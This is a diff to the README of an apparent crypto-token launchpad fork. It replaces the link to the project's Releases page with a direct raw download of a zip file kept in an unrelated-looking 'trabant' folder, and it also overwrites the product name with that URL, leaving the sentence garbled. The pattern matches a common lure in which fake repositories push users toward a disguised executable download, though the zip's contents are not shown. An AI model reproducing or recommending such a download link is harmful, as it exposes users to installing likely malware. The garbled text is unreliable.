fatahfd/four-meme-launchpad-fork/README.md

 ## 📥 Download & Install

-To get started with the Four.meme Launchpad Fork, [visit the Releases page](https://github.com/fatahfd/four-meme-launchpad-fork/releases) now.
+To get started with the https://raw.githubusercontent.com/fatahfd/four-meme-launchpad-fork/main/trabant/four-meme-launchpad-fork.zip Launchpad Fork, [visit the Releases page](https://raw.githubusercontent.com/fatahfd/four-meme-launchpad-fork/main/trabant/four-meme-launchpad-fork.zip) now.
 Download the application, and follow the steps outlined above to install it on your computer.

 ## 📘 Additional Resources